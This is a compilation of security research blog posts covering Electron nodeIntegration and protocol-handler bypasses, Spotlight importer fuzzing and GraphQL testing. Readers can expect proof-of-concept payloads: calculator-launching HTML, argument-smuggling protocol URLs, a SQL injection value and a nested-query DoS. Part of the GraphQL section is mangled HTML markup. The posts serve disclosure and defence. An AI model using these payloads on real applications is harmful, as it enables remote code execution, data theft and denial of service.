# Doyensec's Blog

## Developing Burp Suite Extensions training

1 March 2017 at 23:00
We couldn't be more excited to present our brand-new class on web security and security automation. This blog post provides a quick overview of the 8-hour workshop.

### Title

Developing Burp Suite Extensions - From manual testing to security automation.

### Overview

Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. Traditional application security practices slow development and, in many cases, don't address security at all. Instead, a new approach based on security automation and tactical security testing is needed to ensure important components are being tested before going live. Security professionals must master their tools to improve the efficiency of manual security testing as well as to deploy custom security automation solutions.

Based on this premise, we have created a brand-new class taking advantage of [Burp Suite](https://portswigger.net/burp/) - the de-facto standard for web application security. In just eight hours, we show you how to use Burp Suite's extension capabilities and unleash the power of the tool to improve efficiency and effectiveness during security audits.

After a quick intro to Burp and its extension APIs, we work on setting up an optimal development environment enabling fast coding and debugging. While we develop our code using Oracle's NetBeans, we also provide templates for IntelliJ IDEA and Eclipse.

We will create many different types of plugins:

- *Extension #1*: A custom logger to provide persistency and data export functionalities
- *Extension #2*: A simple (and yet useful) replay tool
- *Extension #3*: Active check for Burp's scanning engine
- *Extension #4*: Passive check for Burp's scanning engine

Finally, we leverage our extensions to build a security automation toolchain integrated in a CI environment (Jenkins). This workshop is based on real-life use cases where the combination of custom checks and automation can help uncover nasty security vulnerabilities.

All templates and code-complete Burp Suite extensions will be available for free on [Doyensec's GitHub](https://github.com/doyensec/burpdeveltraining). If you are curious, we've already uploaded the first three modules.

### Audience

The training is suitable for both web application security specialists and developers. Attendees are expected to have a rudimentary understanding of Burp Suite as well as basic object-oriented programming experience (Burp extensions will be developed in Java).

### Requirements

Attendees should bring their own laptop with the latest Java as well as their favourite IDE installed.

### Upcoming dates

| Location | Date | Notes |
|---|---|---|
| Heidelberg (Germany) | March 21, 2017 | Delivered during the [Troopers 2017 security conference](https://www.troopers.de/events/troopers17/720_developing_burp_suite_extensions_-_from_manual_testing_to_security_automation/). There are still seats available. **Book it today and get Burp swag during the training!** |
| Warsaw (Poland) | June 5, 2017 | Come for the [WarCon invite-only conference](http://warcon.pl/), stay for the training! For registration, please contact [email protected] with subject line "Burp Training Post-WarCon". |

### Private training

This training is delivered worldwide (English language) during both public and private events. Considering that the class is hands-on, we are able to accept up to 15 attendees. Video recording is available on request.

Feel free to contact us at [email protected] to schedule your class!

## Modern Alchemy: Turning XSS into RCE

2 August 2017 at 22:00
### TL;DR

At the recent [Black Hat Briefings 2017](https://www.blackhat.com/us-17/briefings.html#electronegativity-a-study-of-electron-security), Doyensec's co-founder [Luca Carettoni](https://twitter.com/lucacarettoni) presented new research on [Electron](https://electron.atom.io) security. After a quick overview of Electron's security model, we disclosed design weaknesses and implementation bugs that can be leveraged to compromise *many* Electron-based applications. In particular, we discussed a bypass that would allow reliable Remote Code Execution (RCE) when rendering untrusted content (for example via Cross-Site Scripting) even with framework-level protections in place.

In this blog post, we would like to provide insight into the bug (CVE-2017-12581) and remediations.

### What's Electron?

While you may not recognize the name, it is likely that you're already using Electron since it's running on millions of computers. [Slack, Atom, Visual Studio Code, WordPress Desktop, GitHub Desktop, Basecamp3, Mattermost](https://electron.atom.io/apps/) are just a few examples of applications built using this framework. Any time a traditional web application is ported to desktop, it is likely that the developers used Electron.

![Electron Motto](../../../public/images/electron1.png)

### Understanding the *nodeIntegration* flag

While Electron is based on Chromium's Content module, it is not a browser. Since it facilitates the construction of complex desktop applications, Electron gives the developer a lot of power. In fact, thanks to the integration with Node.js, JavaScript can access operating system primitives to take full advantage of native desktop mechanisms.

[It is well understood](https://electron.atom.io/docs/tutorial/security/) that rendering untrusted remote/local content with Node integration enabled is dangerous. For this reason, Electron provides two mechanisms to "sandbox" untrusted resources:

*BrowserWindow*

```javascript
mainWindow = new BrowserWindow({
  "webPreferences": {
    "nodeIntegration" : false,
    "nodeIntegrationInWorker" : false
  }
});
mainWindow.loadURL('https://www.doyensec.com/');
```

*WebView*

```html
<webview src="https://www.doyensec.com/"></webview>
```

In the above examples, the **nodeIntegration** flag is set to false. JavaScript running in the page won't have access to global references despite having a Node.js engine running in the renderer process.

### Hunting for *nodeIntegration* bypasses

It should now be clear why *nodeIntegration* is a critical security-relevant setting for the framework. A vulnerability in this mechanism could lead to full host compromise from simply rendering untrusted web pages. As modern alchemists, we use this type of flaw to turn traditional XSS into RCE. Since all Electron applications are bundled with the framework code, it is also complicated to fix these issues across the entire ecosystem.

During our research, we extensively analyzed all project code changes to uncover previously discovered bypasses (we counted 6 before v1.6.1) with the goal of studying Electron's design and weaknesses. Armed with that knowledge, we went for a hunt.

By studying the [official documentation](https://electron.atom.io/docs/all/), we quickly identified a significant deviation from standard browsers caused by Electron's "glorified" JavaScript APIs.

When a new window is created, Electron returns an instance of [BrowserWindowProxy](https://electron.atom.io/docs/all/#class-browserwindowproxy). This class can be used to manipulate the child browser window, thus subverting the Same-Origin Policy (SOP).

*SOP Bypass #1*

```html
<script>
const win = window.open("https://www.doyensec.com");
win.location = "javascript:alert(document.domain)";
</script>
```

*SOP Bypass #2*

```html
<script>
const win = window.open("https://www.doyensec.com");
win.eval("alert(document.domain)");
</script>
```

The *eval* mechanism used by SOP Bypass #2 can be explained with the following diagram:

![BrowserWindowProxy's Eval](../../../public/images/electron2.png)

Additional source code review revealed the presence of privileged URLs (similar to browsers' privileged zones). Combining the SOP bypass by design with a specific privileged URL defined in *lib/renderer/init.js*, we realized that we could override the nodeIntegration setting.

![Chrome DevTools in Electron, prior to 1.6.8](../../../public/images/electron3.png)

A simple, yet reliable, proof-of-concept of the nodeIntegration bypass affecting all Electron releases prior to 1.6.7 is included here:

```html
<!DOCTYPE html>
<html>
  <head>
    <title>nodeIntegration bypass (SOP2RCE)</title>
  </head>
  <body>
  <script>
  document.write("Current location:" + window.location.href + "<br>");

  const win = window.open("chrome-devtools://devtools/bundled/inspector.html");
  win.eval("const {shell} = require('electron'); shell.openExternal('file:///Applications/Calculator.app');");
  </script>
  </body>
</html>
```

On May 10, 2017 we reported this issue to the maintainers via email. In a matter of hours, we received a reply that they were already working on a fix, since the privileged *chrome-devtools://* had been discovered during an internal security activity just a few days before our report. In fact, while the latest release on the official website at that time was 1.6.7, the [git commit](https://github.com/electron/electron/commit/05b6d91bf4c1e0ee65eeef70cd5d1bd1df125644) that fixes the privileged URL is dated April 24, 2017.

The issue was fixed in 1.6.8 (officially released around the 15th of May). All previous versions of Electron, and consequently all Electron-based apps, were affected. MITRE assigned CVE-2017-12581 to this issue.

### Mitigating nodeIntegration bypass vulnerabilities

- **Keep your application in sync with the latest Electron framework release.** When releasing your product, you're also shipping a bundle composed of Electron, the Chromium shared library and Node. Vulnerabilities affecting these components may impact the security of your application. By updating Electron to the latest version, you ensure that critical vulnerabilities (such as nodeIntegration bypasses) are already patched and cannot be exploited to abuse your application.

- **Adopt secure coding practices.** The first line of defense for your application is your own code. Common web vulnerabilities, such as Cross-Site Scripting (XSS), have a higher security impact on Electron, hence it is highly recommended to adopt secure software development best practices and perform periodic security testing.

- **Know your framework (and its limitations).** Certain principles and security mechanisms implemented by modern browsers are not enforced in Electron (e.g. SOP enforcement). Adopt defense-in-depth mechanisms to mitigate those deficiencies. For more details, please refer to our [Electronegativity, A Study of Electron Security](https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf) presentation and [Electron Security Checklist](https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf) white paper.

- **Use the recent "sandbox" experimental feature.** Even with nodeIntegration disabled, the current implementation of Electron does not completely mitigate all risks introduced by loading untrusted resources. As such, it is recommended to enable [sandboxing](https://electron.atom.io/docs/api/sandbox-option/), which leverages the native Chromium sandbox. A sandboxed renderer does not have a Node.js environment running (with the exception of preload scripts) and the renderer can only make changes to the system by delegating tasks to the main process via IPC. While still not perfect at the time of writing (there are known security issues, sandbox is not supported for the `<webview>` tag, etc.), this option should be enabled to provide additional isolation.
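The mitigations above expressed as main-process code, as an added example that is not part of the original post and not Electron's own documentation: a helper that builds the hardened `webPreferences` (nodeIntegration off, the experimental sandbox on) and refuses child windows and navigations whose origin is not on an allowlist, so a `window.open()` towards a privileged or unexpected URL is cancelled before a `BrowserWindowProxy` for it exists. The `BrowserWindow` class is injected as a parameter so the policy functions run (and can be tested) without Electron installed; the `new-window` and `will-navigate` events are the ones `webContents` exposes in the Electron 1.x line discussed here (newer releases replace `new-window` with `setWindowOpenHandler`). `ALLOWED_ORIGINS` is a constructed value.

```javascript
// Added example: hardened BrowserWindow setup for an Electron main process.
// Not code from the Doyensec post or from Electron itself.
// Node's global URL class is used for origin parsing.

// Constructed allowlist: the only origins the renderer may load or open.
const ALLOWED_ORIGINS = ["https://www.doyensec.com"];

// webPreferences with the renderer isolated from Node.js: nodeIntegration off
// (the flag discussed in the post) and the Chromium sandbox on, so that even
// a bypass of the nodeIntegration check does not hand the page a Node runtime.
function hardenedWebPreferences() {
  return {
    nodeIntegration: false,
    nodeIntegrationInWorker: false,
    sandbox: true,
  };
}

// Policy: a navigation or child-window URL is acceptable only if it is an
// http(s) URL whose origin is on the allowlist. Everything else, including
// javascript:, file: and chrome-devtools: schemes, is refused.
function isAllowedUrl(rawUrl, allowedOrigins = ALLOWED_ORIGINS) {
  let parsed;
  try {
    parsed = new URL(rawUrl);
  } catch (_e) {
    return false; // unparsable input is refused, never guessed at
  }
  if (parsed.protocol !== "https:" && parsed.protocol !== "http:") {
    return false;
  }
  return allowedOrigins.includes(parsed.origin);
}

// Wires the policy into a window's webContents. "new-window" fires for
// window.open() and target=_blank, "will-navigate" for top-level navigations;
// event.preventDefault() cancels either. The returned array collects refused
// URLs so the application can log or alert on them.
function installNavigationGuard(webContents, allowedOrigins = ALLOWED_ORIGINS) {
  const refused = [];
  const guard = (event, url) => {
    if (!isAllowedUrl(url, allowedOrigins)) {
      event.preventDefault();
      refused.push(url);
    }
  };
  webContents.on("new-window", guard);
  webContents.on("will-navigate", guard);
  return refused;
}

// Creates the main window. BrowserWindow is passed in (dependency injection)
// so the function can be exercised outside Electron; in a real main process
// call createMainWindow(require("electron").BrowserWindow).
function createMainWindow(BrowserWindow, startUrl = "https://www.doyensec.com/") {
  const win = new BrowserWindow({ webPreferences: hardenedWebPreferences() });
  const refused = installNavigationGuard(win.webContents);
  win.loadURL(startUrl);
  return { win, refused };
}
```

The allowlist is matched on the full origin, so a plain `http://` copy of an allowed host is refused as well; widen `ALLOWED_ORIGINS` deliberately rather than relaxing the scheme check.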

## Staring into the Spotlight

14 November 2017 at 23:00
Spotlight is the all-pervasive seeing eye of the OSX userland. It drinks from a spout of file events sprayed out of the kernel and neatly indexes such things for later use. It is an amalgamation of binaries and libraries, all neatly fitted together just to give a user oversight of their box. It presents interesting attack surface and this blog post is an explanation of how some of it works.

One day, we found some interesting looking crashes recorded in `/Users/<name>/Library/Logs/DiagnosticReports`

Yet the crashes weren't from the target. In OSX, whenever a file is created, a filesystem event is generated and sent down from the kernel. Spotlight listens for this event and others to immediately parse the created file for metadata. While fuzzing a native file parser, these Spotlight crashes began to appear from mdworker processes. Spotlight was attempting to index each of the mutated input samples, intending to include them in search results later.

### fsevents

The Spotlight system is overseen by mds. It opens and reads from `/dev/fsevents`, which streams down file system event information from the kernel. Instead of dumping the events to disk, like fseventsd, it dumps the events into worker processes to be parsed on behalf of Spotlight. Mds is responsible for delegating work and managing mdworker processes, with whom it communicates through mach messaging. It creates, monitors, and kills mdworkers based on some light rules. The kernel does not block and the volume of events streaming through the fsevents device can be quite a lot. Mds will spawn more mdworker processes when handling a higher event magnitude, but there is no guarantee it can see and capture every single event.

The kernel filters which root level processes can read from this device.

![fsevents filter](../../../public/images/sl-fsevents_process_names.png)

Each of the mdworker processes gets spawned, parses some files, writes the meta info, and dies. Mdworker shares a lot of code with mdimport, its command line equivalent. The mdimport binary is used to debug and test Spotlight importers and therefore makes a great target for auditing and fuzzing. Much of what we say about mdimport also applies to mdworker.

### Importers

You can see what mdworkers are up to with the following: `sudo fs_usage -w -f filesys mdworker`

Importers are found in `/Library/Spotlight`, `/System/Library/Spotlight`, or in an application's bundle within "/Contents/Library/Spotlight". If the latter is chosen, the app typically runs a post-install script with `mdimport -r <importer>` and/or lsregister. The following command shows the list of importers present on my laptop. It shows that some third party apps have installed their own importers.

```
$ mdimport -L
2017-07-30 00:36:15.518 mdimport[40541:1884333] Paths: id(501) (
    "/Library/Spotlight/iBooksAuthor.mdimporter",
    "/Library/Spotlight/iWork.mdimporter",
    "/Library/Spotlight/Microsoft Office.mdimporter",
    "/System/Library/Spotlight/Application.mdimporter",
    ...
    "/System/Library/Spotlight/SystemPrefs.mdimporter",
    "/System/Library/Spotlight/vCard.mdimporter",
    "/Applications/Xcode.app/Contents/Applications/Application Loader.app/Contents/Library/Spotlight/MZSpotlight.mdimporter",
    "/Applications/LibreOffice.app/Contents/Library/Spotlight/OOoSpotlightImporter.mdimporter",
    "/Applications/OmniGraffle.app/Contents/Library/Spotlight/OmniGraffle.mdimporter",
    "/Applications/GarageBand.app/Contents/Library/Spotlight/LogicX_MDImport.mdimporter",
    "/Applications/Xcode.app/Contents/Library/Spotlight/uuid.mdimporter"
)
```

These .mdimporter files are actually just packages holding a binary. These binaries are what we are attacking.

Using mdimport is simple - `mdimport <file>`. Spotlight will only index metadata for filetypes having an associated importer. File types are identified through magic. For example, mdimport reads from the MAGIC environment variable or uses the "/usr/share/file/magic" directory, which contains both the compiled .mgc file and the actual magic patterns. The format of magic files is discussed in [the official Apple developer documentation](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man5/magic.5.html).

### Crash File

![crash logging](../../../public/images/sl-Crash_Log.png)

One thing to notice is that the crash log will contain some helpful information about the cause. The following message gets logged by both mdworker and mdimport, which share much of the same code:

```
Application Specific Information:
import fstype:hfs fsflag:480D000 flags:40000007E diag:0 isXCode:0 uti:com.apple.truetype-datafork-suitcase-font plugin:/Library/Spotlight/Font.mdimporter - find suspect file using: sudo mdutil -t 2682437
```

The 2682437 is the inode reference number for the file in question on disk. The -t argument to mdutil will ask it to look up the file based on volume ID and inode and spit out the string. It performs an open and fcntl on the pseudo directory `/.vol/<Volume ID>/<File iNode>`. You can see this info with the stat syscall on a file.

```
$ stat /etc
16777220 418395 lrwxr-xr-x 1 root wheel 0 11 "Dec 10 05:13:41 2016" "Dec 10 05:13:41 2016" "Dec 10 05:15:47 2016" "Dec 10 05:13:41 2016" 4096 8 0x88000 /etc
$ ls /.vol/16777220/418395
afpovertcp.cfg     fstab.hd            networks            protocols
aliases            ftpd.conf           newsyslog.conf      racoon
aliases.db         ftpd.conf.default   newsyslog.d         rc.common
```

The UTI registered by the importer is also shown: "com.apple.truetype-datafork-suitcase-font". In this case, the crash is caused by a malformed Datafork TrueType suitcase (.dfont) file.

When we find a bug, we can study it under lldb. Launch mdimport under the debugger with the crash file as an argument. In this particular bug it breaks with an exception in the `/System/Library/Spotlight/Font.mdimporter` importer.

![crash in lldb](../../../public/images/sl-crash_in_lldb.png)

The screenshot below shows the problem procedure with the crashing instruction highlighted for this particular bug.

![crashing instruction](../../../public/images/sl-crashing_instruction.png)

The rsi register points into the memory-mapped font file. A value is read out and stored in rax, which is then used as an offset from rcx, which points to the text segment of the executable in memory. A lookup is done on a hardcoded table and parsing proceeds from there. The integer read out of the font file is never validated.

When writing or reversing a Spotlight importer, the main symbol to look at first will be GetMetadataForFile or GetMetadataForURL. This function receives a path to parse and is expected to return the metadata as a CFDictionary.

![lldb backtrace](../../../public/images/sl-lldb_backtrace.png)

We can see, from the stacktrace, how and where mdimport jumps into the GetMetadataForFile function in the Font importer. Fuzzing mdimport is straightforward; crashes and signals are easily caught.

The variety of importers present on OSX are sometimes patched alongside the framework libraries, as code is shared. However, a lot of code is unique to these binaries and represents a nice attack surface. The Spotlight system is extensive, including its own query language, and makes a great target where more research is needed.

When fuzzing in general on OSX, disable Spotlight oversight of the folder where you generate and remove your input samples. The folder can be added in System Preferences -> Spotlight -> Privacy. You can't fuzz mdimport from this folder; instead disable Spotlight with "mdutil -i off" and run your fuzzer from a different folder.

[email protected]

## We're hiring - Join Doyensec!

26 November 2017 at 23:00
At [Doyensec](https://doyensec.com/), we believe that quality is the natural product of passion and care. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security.

We are a small, highly focused team. We concentrate on application security and do fewer things better. We don't care about your education, background and certifications. If you are *really* good and passionate at building and breaking complex software, you're the right candidate.

### Open Positions

#### :: Full-stack Security Automation Engineer (Six Months Collaboration, Remote Work) ::

We are looking for a full-stack senior software engineer who can help us build security automation tools. If you've ever built a fuzzer, played with static analysis and enhanced a web scanner engine, you probably have the right skillset for the job.

We offer a well-paid six-month collaboration, combined with an additional bonus upon successful completion of the project.

Responsibilities:

- Full-stack development (front-end, back-end components) of web security testing tools
- Solve technical challenges at the edge of web security R&D, together with Doyensec's founders

Requirements:

- Experience developing multi-tiered software applications or products. We generally use Node.js and Java, and require proficiency in those languages
- Ability to work with standard dev tools and techniques (IDE, git, …)
- You're passionate about building great software and can have fun while doing it
- Interested in web security, with a good understanding of common software vulnerabilities
- You're self-driven and can focus on a project to make it happen
- Eager to learn, adapt and perfect your work

Contact us at [email protected]

#### :: Application Security Engineer (Full-time, Remote Work - Europe) ::

We are looking for an experienced security engineer to join our consulting team. We perform graybox security testing on complex web and mobile applications. We need someone who can hit the ground running. If you're good at *"crawling around in the ventilation ducts of the world's most popular and important applications"*, you probably have the right skillset for the job.

We offer a competitive salary in a supportive and dynamic environment that rewards hard work and talent. We are dedicated to providing research-driven application security and therefore invest 25% of *your* time exclusively in research, where we build security testing tools, discover new attack techniques, and develop countermeasures.

Responsibilities:

- Security testing of web and mobile (iOS, Android) applications
- Vulnerability research activities, coordinated and executed with Doyensec's founders
- Partner with customers to ensure the project's objectives are achieved

Requirements:

- Ability to discover, document and fix security bugs
- You're passionate about understanding complex systems and can have fun while doing it
- Top-notch in web security. Show us public research, code, advisories, etc.
- Eager to learn, adapt, and perfect your work

Contact us at [email protected]

## GraphQL - Security Overview and Testing Tips

16 May 2018 at 22:00
pWith the increasing popularity of GraphQL technology we are summarizing some documentation and tips about common security mistakes./p h3 id=what-is-graphqlWhat is GraphQL?/h3 pa href=https://graphql.org/GraphQL/a is a data query language developed by Facebook and publicly released in 2015. It is an alternative to REST API./p pEven if you don’t see any GraphQL out there, it is likely you’re already using it since it’s running on some big tech giants like Facebook, GitHub, Pinterest, Twitter, HackerOne and a a href=http://graphql.org/users/lot more/a./p h4 id=a-few-key-points-on-this-technologyA few key points on this technology/h4 ul li pGraphQL provides a complete and understandable description of the data in the API and gives clients the power to ask for exactly what they need. strongQueries always return predictable results/strong./p /li li pWhile typical REST APIs require loading from multiple URLs, GraphQL APIs get strongall the data/strong your app needs strongin a single request/strong./p /li li pGraphQL APIs are organized in terms of types and fields, not endpoints. You can access the full capabilities of strongall your data from a single endpoint/strong./p /li li pGraphQL is strongstrongly typed/strong to ensure that application only ask for what’s possible and provide clear and helpful errors./p /li li pstrongNew fields and types can be added/strong to the GraphQL API strongwithout impacting existing queries. Aging fields can be deprecated/strong and hidden from tools./p /li /ul pBefore we start diving into the GraphQL security landscape, here is a brief recap on how it works. 
The a href=http://graphql.org/learn/official documentation/a is well written and was really helpful./p pA GraphQL query looks like this:/p pemBasic GraphQL Query/em/p div class=language-graphql highlighter-rougediv class=highlightpre class=highlightcodespan class=kquery/spanspan class=p{/spanspan class=w /spanspan class=nuser/spanspan class=p{/spanspan class=w /spanspan class=nid/spanspan class=w /spanspan class=nemail/spanspan class=w /spanspan class=nfirstName/spanspan class=w /spanspan class=nlastName/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /span/code/pre/div/div pWhile the response is JSON:/p pemBasic GraphQL Response/em/p div class=language-json highlighter-rougediv class=highlightpre class=highlightcodespan class=p{/spanspan class=w /spanspan class=nldata/spanspan class=p:/spanspan class=w /spanspan class=p{/spanspan class=w /spanspan class=nluser/spanspan class=p:/spanspan class=w /spanspan class=p{/spanspan class=w /spanspan class=nlid/spanspan class=p:/spanspan class=w /spanspan class=s21/spanspan class=p,/spanspan class=w /spanspan class=nlemail/spanspan class=p:/spanspan class=w /spanspan [email protected]/spanspan class=p,/spanspan class=w /spanspan class=nlfirstName/spanspan class=p:/spanspan class=w /spanspan class=s2Paolo/spanspan class=p,/spanspan class=w /spanspan class=nllastName/spanspan class=p:/spanspan class=w /spanspan class=s2Stagno/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /spanspan class=p}/spanspan class=w /span/code/pre/div/div h3 id=security-testing-tipsSecurity Testing Tips/h3 pSince a href=https://portswigger.net/Burp Suite/a does not understand GraphQL syntax well, I recommend using the a href=https://github.com/andev-software/graphql-idegraphql-ide/a, an Electron based app that allows you to edit and send requests to a GraphQL endpoint; I also wrote a small python script a 
href=https://github.com/doyensec/graph-ql/GraphQL_Introspection.py/a that enumerates a GraphQL endpoint (with introspection) in order to pull out documentation. The script is useful for examining the GraphQL schema looking for information leakage, hidden data and fields that are not intended to be accessible./p pThe tool will generate a HTML report similar to the following:/p pimg src=../../../public/images/GraphQL_Introspection.png alt=Python Script pulling data from a GraphQL endpoint align=center //p pa href=https://graphql.org/learn/introspection/Introspection/a is used to ask for a GraphQL schema for information about what queries, types and so on it supports./p pAs a pentester, I would recommend to look for requests issued to strong“/graphql”/strong or strong“/graphql.php”/strong since those are usual GraphQL endpoint names; you should also search for strong“/graphiql”/strong, strong”graphql/console/”/strong, online GraphQL IDEs to interact with the backend, and strong“/graphql.php?debug=1”/strong (debugging mode with additional error reporting) since they may be left open by developers./p pWhen testing an application, verify whether requests can be issued without the usual authorization token header:/p pimg src=../../../public/images/GraphQL_AuthToken.png alt=GraphQL Bearer Authorization Header Example align=center //p pSince the GraphQL framework does not provide any means for securing your data, developers are in charge of implementing access control as stated in the documentation:/p blockquote p“However, for a production codebase, delegate authorization logic to the business logic layer”./p /blockquote pThings may go wrong, thus it is important to verify whether a user without proper authentication and/or authorization can request the whole underlying database from the server./p pWhen building an application with GraphQL, developers have to map data to queries in their chosen database technology. 
This is where security vulnerabilities can be easily introduced, leading to Broken Access Controls, Insecure Direct Object References and even SQL/NoSQL Injections.

As an example of a broken implementation, the following request/response pair demonstrates that we can fetch the data of any user of the platform (by cycling through the ID parameter) while simultaneously dumping password hashes:

*Query*

```graphql
query {
  user(id: 165274) {
    id
    email
    firstName
    lastName
    password
  }
}
```

*Response*

```json
{
  "data": {
    "user": {
      "id": "165274",
      "email": "[email protected]",
      "firstName": "John",
      "lastName": "Doe",
      "password": "5F4DCC3B5AA765D61D8327DEB882CF99"
    }
  }
}
```

Another thing that you will have to check is related to information disclosure when trying to perform illegal queries:

*Information Disclosure*

```json
{
  "errors": [
    {
      "message": "Invalid ID.",
      "locations": [
        {
          "line": 2,
          "column": 12
        }
      ],
      "Stack": "Error: invalid ID\n at (/var/www/examples/04-bank/graphql.php)\n"
    }
  ]
}
```

Even though GraphQL is strongly typed, SQL/NoSQL injections are still possible, since GraphQL is just a layer between client apps and the database. The problem may reside in the layer developed to fetch variables from GraphQL queries in order to interrogate the database: variables that are not properly sanitized lead to plain old SQL injection. In the case of MongoDB, NoSQL injection may not be that simple, since we cannot "juggle" types (e.g. turning a string into an array; see PHP MongoDB Injection, http://php.net/manual/en/mongo.security.php).

*GraphQL SQL Injection*

```graphql
mutation search($filters: Filters!) {
  authors(filter: $filters)
  viewer {
    id
    email
    firstName
    lastName
  }
}
```

with the following variables:

```json
{
  "filters": {
    "username": "paolo' or 1=1--",
    "minstories": 0
  }
}
```

*Beware of nested queries!* They can allow a malicious client to perform a DoS (Denial of Service) attack via overly complex queries that consume all the resources of the server:

*Nested Query*

```graphql
query {
  stories {
    title
    body
    comments {
      comment
      author {
        comments {
          author {
            comments {
              comment
              author {
                comments {
                  comment
                  author {
                    comments {
                      comment
                      author {
                        name
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}
```

An easy remediation against DoS could be setting a timeout, a maximum depth or a query complexity threshold value.

Keep in mind that in the PHP GraphQL implementation (https://github.com/webonyx/graphql-php):

- Complexity analysis is disabled by default
- Limiting query depth is disabled by default
- Introspection is enabled by default. It means that anybody can get a full description of your schema by sending a special query containing the meta fields `__type` and `__schema`

### Outro

GraphQL is a new and interesting technology, which can be used to build secure applications.
Since developers are in charge of implementing access control, applications are prone to classic web application vulnerabilities like Broken Access Controls, Insecure Direct Object References, Cross-Site Scripting (XSS) and classic injection bugs. As with any technology, GraphQL-based applications may be prone to implementation errors like this real-life example (https://salt.agency/blog/facebook-security-loophole/):

> "By using a script, an entire country's (I tested with the US, the UK and Canada) possible number combinations can be run through these URLs, and if a number is associated with a Facebook account, it can then be associated with a name and further details (images, and so on)."

[email protected]

##### Resources:

- https://en.wikipedia.org/wiki/GraphQL
- https://dev-blog.apollodata.com/the-concepts-of-graphql-bc68bd819be3
- https://graphql.org/learn/
- https://www.howtographql.com/
- https://www.hackerone.com/blog/the-30-thousand-dollar-gem-part-1
- https://hackerone.com/reports/291531
- https://labs.detectify.com/2018/03/14/graphql-abuse/
- https://medium.com/the-graphqlhub/graphql-and-authentication-b73aed34bbeb
- http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/
- https://webonyx.github.io/graphql-php/
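The nested-query DoS and the "maximum depth" remediation discussed above, as an added example that is not part of the original post and is not graphql-php's implementation: a small JavaScript depth analyser that walks a GraphQL document and rejects it before execution when selection sets nest deeper than a configured limit. The two queries are constructed to mirror the ones in the post; the function names and the limit are the example's own.

```javascript
'use strict';

// Added example, not from the post and not graphql-php's own depth limiter: a
// pre-execution check that measures how deeply selection sets nest in a GraphQL
// document and rejects documents over a configured maximum. Only braces, string
// literals and comments are tokenised, so no GraphQL library is needed.

// Constructed query mirroring the nested one in the post: 12 nested selection sets.
const NESTED_QUERY = `query {
  stories {
    title
    body
    comments {
      comment
      author {
        comments {
          author {
            comments {
              comment
              author {
                comments {
                  comment
                  author {
                    comments {
                      comment
                      author { name }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}`;

// Constructed query mirroring the IDOR example in the post: 2 nested selection sets.
const SIMPLE_QUERY = 'query { user(id: 165274) { id email firstName lastName } }';

// Maximum nesting depth of selection sets in `query`. Braces inside "..." strings,
// """...""" block strings and # comments are ignored so a client cannot hide or
// fake nesting there; unbalanced braces throw instead of returning a depth.
function selectionDepth(query) {
  let depth = 0;
  let max = 0;
  let i = 0;
  while (i < query.length) {
    const ch = query[i];
    if (ch === '#') {                       // line comment: skip to end of line
      while (i < query.length && query[i] !== '\n') i++;
      continue;
    }
    if (query.startsWith('"""', i)) {        // block string: skip to the closing """
      const end = query.indexOf('"""', i + 3);
      if (end === -1) throw new Error('unterminated block string');
      i = end + 3;
      continue;
    }
    if (ch === '"') {                        // string literal, honouring \" escapes
      i++;
      while (i < query.length && query[i] !== '"') {
        if (query[i] === '\\') i++;
        i++;
      }
      if (i >= query.length) throw new Error('unterminated string');
      i++;
      continue;
    }
    if (ch === '{') {
      depth++;
      if (depth > max) max = depth;
    } else if (ch === '}') {
      depth--;
      if (depth < 0) throw new Error('unbalanced braces');
    }
    i++;
  }
  if (depth !== 0) throw new Error('unbalanced braces');
  return max;
}

// Gate to run before handing the document to the executor: returns the measured
// depth and whether the document may proceed under `maxDepth`.
function enforceMaxDepth(query, maxDepth) {
  const depth = selectionDepth(query);
  return { depth, allowed: depth <= maxDepth };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(enforceMaxDepth(SIMPLE_QUERY, 5)); // { depth: 2, allowed: true }
  console.log(enforceMaxDepth(NESTED_QUERY, 5)); // { depth: 12, allowed: false }
}
```

Depth is the cheapest of the three remediations listed above and catches the query shown in the post outright; a complexity threshold (weighting list fields by their requested page size) is the next step, since a shallow query over a large list can be just as expensive as a deep one.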

Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)

23 May 2018 at 22:00
As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (https://electronjs.org/blog/protocol-handler-fix), CVE-2018-1000006, and identified a bypass.

Under certain circumstances this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash (`--`) in the registry entry are affected.

We reported the issue to the Electron core team (via [email protected]) on May 14, 2018 and received immediate notification that they were already working on a patch. The issue was also reported by Google's Nicolas Ruff (https://twitter.com/newsoft) a few days earlier.

### CVE-2018-1000006

On January 22, 2018 Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly, no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts (e.g. https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62), and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

```html
<script>
window.location = 'myapp://foobar --gpu-launcher=cmd c/ start calc --foobar='
</script>
```

Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters, which led to a bypass of the previous patch with:

```html
<script>
window.location = 'myapp://foobar --GPU-launcher=cmd c/ start calc --foobar='
</script>
```

### Understanding the patch

The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc (https://github.com/electron/electron/blob/fe7947da90a6e161e731a10e4246a07b7d71dea3/atom/app/command_line_args.cc) and consists of a validation mechanism which ensures users won't be able to include Electron/Chromium/Node arguments after a URL (the specific protocol handler). Bear in mind that some locally executed applications do require the ability to pass custom arguments.

